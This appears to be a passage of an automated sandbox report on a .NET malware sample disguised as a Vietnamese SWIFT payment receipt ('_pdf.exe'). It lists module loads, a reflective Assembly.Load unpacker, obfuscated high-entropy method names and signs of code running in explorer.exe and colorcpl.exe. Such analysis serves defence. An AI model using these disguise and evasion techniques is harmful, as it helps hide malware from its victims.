Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: colorcpl.pdbGCTL source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2231174141.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2228754932.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.3346631053.00000000008F0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2231174141.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2228754932.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000002.3346631053.00000000008F0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2228323315.0000000004E5C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2231435212.000000000500B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe, 00000004.00000002.2229987491.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000007.00000002.3357917667.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2228323315.0000000004E5C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2231435212.000000000500B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.3357917667.000000000535E000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.2ee18c8.0.raw.unpack, bg.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, GXx0SGmTOiRtn7taWO.cs	.Net Code: Uppc4PVdBa System.Reflection.Assembly.Load(byte[])
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, GXx0SGmTOiRtn7taWO.cs	.Net Code: Uppc4PVdBa System.Reflection.Assembly.Load(byte[])
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.d470000.6.raw.unpack, bg.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, GXx0SGmTOiRtn7taWO.cs	.Net Code: Uppc4PVdBa System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_0D494D30 push ds; iretd	0_2_0D494D32
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_0D491CD2 pushad ; retf	0_2_0D491CDD
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_012233D3 push ss; iretd	0_2_012233D4
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_05344B60 pushfd ; iretd	0_2_05344B61
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_05343E88 push esp; retf	0_2_05343E89
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 0_2_0A2A4660 pushad ; iretd	0_2_0A2A4669
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0040E33E pushfd ; retf	4_2_0040E3A2
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0040E39D pushfd ; retf	4_2_0040E3A2
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0040E440 push FFFFFF8Bh; ret	4_2_0040E45E
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041D4B5 push eax; ret	4_2_0041D508
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041D56C push eax; ret	4_2_0041D572
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041D502 push eax; ret	4_2_0041D508
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_0041D50B push eax; ret	4_2_0041D572
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011E09AD push ecx; mov dword ptr [esp], ecx	4_2_011E09B6
Source: C:\Users\user\Desktop\Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe	Code function: 4_2_011B1366 push eax; iretd	4_2_011B1369
Source: C:\Windows\explorer.exe	Code function: 6_2_10A5E9B5 push esp; retn 0000h	6_2_10A5EAE7
Source: C:\Windows\explorer.exe	Code function: 6_2_10A5EB02 push esp; retn 0000h	6_2_10A5EB03
Source: C:\Windows\explorer.exe	Code function: 6_2_10A5EB1E push esp; retn 0000h	6_2_10A5EB1F
Source: C:\Windows\explorer.exe	Code function: 6_2_11592B1E push esp; retn 0000h	6_2_11592B1F
Source: C:\Windows\explorer.exe	Code function: 6_2_11592B02 push esp; retn 0000h	6_2_11592B03
Source: C:\Windows\explorer.exe	Code function: 6_2_115929B5 push esp; retn 0000h	6_2_11592AE7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_008F1A6D push ecx; ret	7_2_008F1A80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051C27FA pushad ; ret	7_2_051C27F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051C225F pushad ; ret	7_2_051C27F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051F09AD push ecx; mov dword ptr [esp], ecx	7_2_051F09B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_051C283D push eax; iretd	7_2_051C2858
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0328E33E pushfd ; retf	7_2_0328E3A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0328E39D pushfd ; retf	7_2_0328E3A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0329D50B push eax; ret	7_2_0329D572
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0329D502 push eax; ret	7_2_0329D508
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0329D56C push eax; ret	7_2_0329D572

Source: Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe

Static PE information: section name: .text entropy: 7.8646973020800965

Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, O9FANg0bt2GobvTVrX.cs	High entropy of concatenated method names: 'x21oqUIj7P', 'KIuovP410N', 'bdIbZm1Tls', 'Busbne4bmw', 'cS5bYY91Tn', 'FL9bRJSGdK', 'wnsbgpkFGY', 'tbfb3AXLDM', 'UUdbW47ioX', 'XvRb7hyS6A'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, TTl4eHddUhvBjBIjsO9.cs	High entropy of concatenated method names: 'ToString', 'Rr3V27U4wE', 'aQSVclX3nq', 'dwGVGihWQv', 'vdTVIl1hND', 'XNpVk6dDKE', 'l5vVbtRnH9', 'NYJVo6Sijy', 'pdFS3HGoZYw7PTMmH0e', 'xqaA4NGvLGEC0qhMdxv'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, tND9U1NKeBju5NUoAJ.cs	High entropy of concatenated method names: 'nCgQjrwXvd', 'tbbQ59M3w0', 'tYYQEFlESC', 'b0FQuJ3W2T', 'hgAQnxgwJd', 'tBOQYBWQPG', 'RDqQgy07XB', 'j61Q3euwwH', 'C8xQ7qaQ4R', 'DYTQ1qbAwY'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, ttLDUujofieHjDbfiY.cs	High entropy of concatenated method names: 'wCdk8udWbu', 'P8dkeRhYRY', 'G7jkSYF98D', 'EPZk9KPruu', 'cV2kylRG9h', 'cUTka45cuZ', 'revks9kF1r', 'BQXkrefGnk', 'VKEkCghObV', 'nBAkUiFcXq'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, S99sKCwkUgfjFW1F2E.cs	High entropy of concatenated method names: 'G1H4mcTUF', 'UqFplSk41', 'jCE6meMxc', 'p7hvkNvYZ', 'TBD5nBKf3', 'Jvr0ZnOhh', 'klaPATth1HglNFA8R1', 'aWZSDCycKmhj4U6mEe', 'NKrAhiWQd', 'VA5VcIfDQ'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, m17wl5gyXIYxEphQSi.cs	High entropy of concatenated method names: 'gWTPISNSk4', 'VpoPbxEfRF', 'yymPLpq1W4', 'uSHLUIob6I', 'TVGLzyfpcQ', 'OvdPijsr3C', 'F10PduiwUn', 'YV3PwhE3iO', 'cI9P2aLFDP', 'XSaPcWLeaM'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, N51F8eS7M336gjuOQe.cs	High entropy of concatenated method names: 'ToString', 'JNtf1RXoC7', 'JFYfuRfuN2', 'ywQfZF8FIc', 'QLvfnXxIAV', 'cWEfYCuWAt', 'uE6fR4ISs6', 'ferfgHfhfG', 'Phff3i98RG', 'WU1fWpCxae'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, RGkZwXd2QKZGKicuqrN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T5mV8GjvLq', 'Y0UVeVa5B9', 'XnLVSfWMSQ', 'FPEV9HeRaI', 'UJNVycO8xo', 'WZpVa03LHb', 'MfJVsMtiRj'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, CQI3QdEcGdnwovGMHe.cs	High entropy of concatenated method names: 'SrnLGqhse1', 'PgJLkAgjvk', 'BbKLo4BVCU', 'PGuLPoik4j', 'U1aLmf6o0H', 't3CoyGkJNg', 'MuGoa8cxK1', 'p5xosBIJMG', 'DLdordTYRJ', 'NeDoC03wIm'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, YctVRKUxpHKimVh9oZ.cs	High entropy of concatenated method names: 'itJXdmsVfl', 'adTX2cU5a7', 'hdtXc8d89y', 'TZgXIUcr1K', 'rYgXkKI1I5', 'jv8XoYTIBm', 'y9tXLsaOFM', 'QBHAs2J0MZ', 'uTYArRcyd0', 'faaACgYwHQ'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, Opxb7eaP868xKQGrG7.cs	High entropy of concatenated method names: 'G79trVATuZ', 'eyrtU8vZqd', 'gM3Ai2axW4', 'sDpAdmX2O1', 'TPNt1yp3uV', 'jMkthkhkWA', 'RGetNGDrBD', 'NXjt8MM9n0', 'iHCteKH0dV', 'VmptSKmT1B'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, rq1BUr5VZZXD0uE869.cs	High entropy of concatenated method names: 'rvxbpOnGBp', 'G1nb6ogWqk', 'koFbj1wVAb', 'V9Eb5dvfxe', 'NgEbJbKmsF', 'nvXbfwpXBi', 'LxFbtKa1L0', 'pxTbAc1gHZ', 'Pv3bXvCEMS', 'JeAbVb30FY'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, txwAHy8Uubv9bs8qMA.cs	High entropy of concatenated method names: 'TCIJ7EesbB', 'kEeJhiSiPk', 'hADJ8F1Jf5', 'SMRJeDniAI', 'XXnJunkO9V', 'zmHJZeqcBS', 'LEfJn3qPjN', 'XvVJYMekbi', 'iodJRj3Tau', 'XfQJg0y8vv'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, Ojee41CAUtxnDk0HO8.cs	High entropy of concatenated method names: 'MlRAEK1uLA', 'LOcAuQ7mde', 'NYmAZcDewj', 'vJLAnLigkx', 'UKDA80PHJk', 'BrwAYVbElr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, OIoygQdidwRtww3HMue.cs	High entropy of concatenated method names: 'zFoXxA6LtK', 'uDPXHXCyEo', 'cqYX4A1CeS', 'QbyXppbyju', 'YiOXqbhjqK', 'gknX6b331s', 'BkKXvE5uiC', 'YSnXjWf0wE', 'aMxX5HNyGu', 'FJ6X0rxIqj'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, R5ylPsziDFFfkUvxkJ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jp6XQf6hHg', 'CG9XJ7JrjL', 'AC4Xfuhk1a', 'ekoXthpCc5', 'D0WXA8OrJa', 'Jx1XXZuRlU', 'D3OXVckoVM'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, xYPAYSraJMMNXUsLYd.cs	High entropy of concatenated method names: 'fxYAIrEefT', 'N4yAkUxAje', 'ERrAbHoPsO', 'UAcAoGw4ss', 'LCbALLocGW', 'OsPAPdXjyq', 'MnBAmX5mOu', 'rIhAFZc4St', 'K9gATmEdJd', 'dnBAMGR6GJ'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, mGYi92W6vWKXwwGZUR.cs	High entropy of concatenated method names: 'UgoPx5agkw', 'XcLPHOPD4I', 'y5AP4MeR1U', 'WdrPpVvpUf', 'zU8PqyG0LT', 'P3GP6VgJor', 'A6BPvFiQG9', 'S8LPjP1Iyi', 'MFdP51PGy9', 'G8yP0jOBVU'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, GXx0SGmTOiRtn7taWO.cs	High entropy of concatenated method names: 'FaF2GPawdM', 'Urq2IyImfT', 'o412kNe4nF', 'Fcg2bQALh1', 'm982oQ9Ujm', 'DAN2LiKnjT', 'DlR2PVmecT', 'H0d2mBaJM7', 'uua2FEAs4X', 'CfJ2TpOv1F'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, AInQANcBZDOFBXnowL.cs	High entropy of concatenated method names: 'kvVdPtLDUu', 'ifidmeHjDb', 'WVZdTZXD0u', 'G86dM979FA', 'CTVdJrXvQI', 'LQddfcGdnw', 'A99hkL0VWNn21TcMji', 'jno0dHMjpvHNr3MNRB', 'l9XddVRc9E', 'QXZd2Dv5I5'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.7d80000.4.raw.unpack, o7K34QkyJitaHU4ZWf.cs	High entropy of concatenated method names: 'Dispose', 'sZhdCvBK5i', 'J9Nwu1qJtZ', 'iw5772Uwhs', 'KxYdUPAYSa', 'oMMdzNXUsL', 'ProcessDialogKey', 'Jd7wijee41', 'rUtwdxnDk0', 'yO8wwUctVR'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, O9FANg0bt2GobvTVrX.cs	High entropy of concatenated method names: 'x21oqUIj7P', 'KIuovP410N', 'bdIbZm1Tls', 'Busbne4bmw', 'cS5bYY91Tn', 'FL9bRJSGdK', 'wnsbgpkFGY', 'tbfb3AXLDM', 'UUdbW47ioX', 'XvRb7hyS6A'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, TTl4eHddUhvBjBIjsO9.cs	High entropy of concatenated method names: 'ToString', 'Rr3V27U4wE', 'aQSVclX3nq', 'dwGVGihWQv', 'vdTVIl1hND', 'XNpVk6dDKE', 'l5vVbtRnH9', 'NYJVo6Sijy', 'pdFS3HGoZYw7PTMmH0e', 'xqaA4NGvLGEC0qhMdxv'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, tND9U1NKeBju5NUoAJ.cs	High entropy of concatenated method names: 'nCgQjrwXvd', 'tbbQ59M3w0', 'tYYQEFlESC', 'b0FQuJ3W2T', 'hgAQnxgwJd', 'tBOQYBWQPG', 'RDqQgy07XB', 'j61Q3euwwH', 'C8xQ7qaQ4R', 'DYTQ1qbAwY'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, ttLDUujofieHjDbfiY.cs	High entropy of concatenated method names: 'wCdk8udWbu', 'P8dkeRhYRY', 'G7jkSYF98D', 'EPZk9KPruu', 'cV2kylRG9h', 'cUTka45cuZ', 'revks9kF1r', 'BQXkrefGnk', 'VKEkCghObV', 'nBAkUiFcXq'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, S99sKCwkUgfjFW1F2E.cs	High entropy of concatenated method names: 'G1H4mcTUF', 'UqFplSk41', 'jCE6meMxc', 'p7hvkNvYZ', 'TBD5nBKf3', 'Jvr0ZnOhh', 'klaPATth1HglNFA8R1', 'aWZSDCycKmhj4U6mEe', 'NKrAhiWQd', 'VA5VcIfDQ'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, m17wl5gyXIYxEphQSi.cs	High entropy of concatenated method names: 'gWTPISNSk4', 'VpoPbxEfRF', 'yymPLpq1W4', 'uSHLUIob6I', 'TVGLzyfpcQ', 'OvdPijsr3C', 'F10PduiwUn', 'YV3PwhE3iO', 'cI9P2aLFDP', 'XSaPcWLeaM'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, N51F8eS7M336gjuOQe.cs	High entropy of concatenated method names: 'ToString', 'JNtf1RXoC7', 'JFYfuRfuN2', 'ywQfZF8FIc', 'QLvfnXxIAV', 'cWEfYCuWAt', 'uE6fR4ISs6', 'ferfgHfhfG', 'Phff3i98RG', 'WU1fWpCxae'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, RGkZwXd2QKZGKicuqrN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T5mV8GjvLq', 'Y0UVeVa5B9', 'XnLVSfWMSQ', 'FPEV9HeRaI', 'UJNVycO8xo', 'WZpVa03LHb', 'MfJVsMtiRj'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, CQI3QdEcGdnwovGMHe.cs	High entropy of concatenated method names: 'SrnLGqhse1', 'PgJLkAgjvk', 'BbKLo4BVCU', 'PGuLPoik4j', 'U1aLmf6o0H', 't3CoyGkJNg', 'MuGoa8cxK1', 'p5xosBIJMG', 'DLdordTYRJ', 'NeDoC03wIm'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, YctVRKUxpHKimVh9oZ.cs	High entropy of concatenated method names: 'itJXdmsVfl', 'adTX2cU5a7', 'hdtXc8d89y', 'TZgXIUcr1K', 'rYgXkKI1I5', 'jv8XoYTIBm', 'y9tXLsaOFM', 'QBHAs2J0MZ', 'uTYArRcyd0', 'faaACgYwHQ'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, Opxb7eaP868xKQGrG7.cs	High entropy of concatenated method names: 'G79trVATuZ', 'eyrtU8vZqd', 'gM3Ai2axW4', 'sDpAdmX2O1', 'TPNt1yp3uV', 'jMkthkhkWA', 'RGetNGDrBD', 'NXjt8MM9n0', 'iHCteKH0dV', 'VmptSKmT1B'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, rq1BUr5VZZXD0uE869.cs	High entropy of concatenated method names: 'rvxbpOnGBp', 'G1nb6ogWqk', 'koFbj1wVAb', 'V9Eb5dvfxe', 'NgEbJbKmsF', 'nvXbfwpXBi', 'LxFbtKa1L0', 'pxTbAc1gHZ', 'Pv3bXvCEMS', 'JeAbVb30FY'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, txwAHy8Uubv9bs8qMA.cs	High entropy of concatenated method names: 'TCIJ7EesbB', 'kEeJhiSiPk', 'hADJ8F1Jf5', 'SMRJeDniAI', 'XXnJunkO9V', 'zmHJZeqcBS', 'LEfJn3qPjN', 'XvVJYMekbi', 'iodJRj3Tau', 'XfQJg0y8vv'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, Ojee41CAUtxnDk0HO8.cs	High entropy of concatenated method names: 'MlRAEK1uLA', 'LOcAuQ7mde', 'NYmAZcDewj', 'vJLAnLigkx', 'UKDA80PHJk', 'BrwAYVbElr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, OIoygQdidwRtww3HMue.cs	High entropy of concatenated method names: 'zFoXxA6LtK', 'uDPXHXCyEo', 'cqYX4A1CeS', 'QbyXppbyju', 'YiOXqbhjqK', 'gknX6b331s', 'BkKXvE5uiC', 'YSnXjWf0wE', 'aMxX5HNyGu', 'FJ6X0rxIqj'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, R5ylPsziDFFfkUvxkJ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jp6XQf6hHg', 'CG9XJ7JrjL', 'AC4Xfuhk1a', 'ekoXthpCc5', 'D0WXA8OrJa', 'Jx1XXZuRlU', 'D3OXVckoVM'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, xYPAYSraJMMNXUsLYd.cs	High entropy of concatenated method names: 'fxYAIrEefT', 'N4yAkUxAje', 'ERrAbHoPsO', 'UAcAoGw4ss', 'LCbALLocGW', 'OsPAPdXjyq', 'MnBAmX5mOu', 'rIhAFZc4St', 'K9gATmEdJd', 'dnBAMGR6GJ'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, mGYi92W6vWKXwwGZUR.cs	High entropy of concatenated method names: 'UgoPx5agkw', 'XcLPHOPD4I', 'y5AP4MeR1U', 'WdrPpVvpUf', 'zU8PqyG0LT', 'P3GP6VgJor', 'A6BPvFiQG9', 'S8LPjP1Iyi', 'MFdP51PGy9', 'G8yP0jOBVU'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, GXx0SGmTOiRtn7taWO.cs	High entropy of concatenated method names: 'FaF2GPawdM', 'Urq2IyImfT', 'o412kNe4nF', 'Fcg2bQALh1', 'm982oQ9Ujm', 'DAN2LiKnjT', 'DlR2PVmecT', 'H0d2mBaJM7', 'uua2FEAs4X', 'CfJ2TpOv1F'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, AInQANcBZDOFBXnowL.cs	High entropy of concatenated method names: 'kvVdPtLDUu', 'ifidmeHjDb', 'WVZdTZXD0u', 'G86dM979FA', 'CTVdJrXvQI', 'LQddfcGdnw', 'A99hkL0VWNn21TcMji', 'jno0dHMjpvHNr3MNRB', 'l9XddVRc9E', 'QXZd2Dv5I5'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4a8ee98.1.raw.unpack, o7K34QkyJitaHU4ZWf.cs	High entropy of concatenated method names: 'Dispose', 'sZhdCvBK5i', 'J9Nwu1qJtZ', 'iw5772Uwhs', 'KxYdUPAYSa', 'oMMdzNXUsL', 'ProcessDialogKey', 'Jd7wijee41', 'rUtwdxnDk0', 'yO8wwUctVR'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, O9FANg0bt2GobvTVrX.cs	High entropy of concatenated method names: 'x21oqUIj7P', 'KIuovP410N', 'bdIbZm1Tls', 'Busbne4bmw', 'cS5bYY91Tn', 'FL9bRJSGdK', 'wnsbgpkFGY', 'tbfb3AXLDM', 'UUdbW47ioX', 'XvRb7hyS6A'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, TTl4eHddUhvBjBIjsO9.cs	High entropy of concatenated method names: 'ToString', 'Rr3V27U4wE', 'aQSVclX3nq', 'dwGVGihWQv', 'vdTVIl1hND', 'XNpVk6dDKE', 'l5vVbtRnH9', 'NYJVo6Sijy', 'pdFS3HGoZYw7PTMmH0e', 'xqaA4NGvLGEC0qhMdxv'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, tND9U1NKeBju5NUoAJ.cs	High entropy of concatenated method names: 'nCgQjrwXvd', 'tbbQ59M3w0', 'tYYQEFlESC', 'b0FQuJ3W2T', 'hgAQnxgwJd', 'tBOQYBWQPG', 'RDqQgy07XB', 'j61Q3euwwH', 'C8xQ7qaQ4R', 'DYTQ1qbAwY'
Source: 0.2.Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exe.4afeeb8.2.raw.unpack, ttLDUujofieHjDbfiY.cs	High entropy of concatenated method names: 'wCdk8udWbu', 'P8dkeRhYRY', 'G7jkSYF98D', 'EPZk9KPruu', 'cV2kylRG9h', 'cUTka45cuZ', 'revks9kF1r', 'BQXkrefGnk', 'VKEkCghObV', 'nBAkUiFcXq'
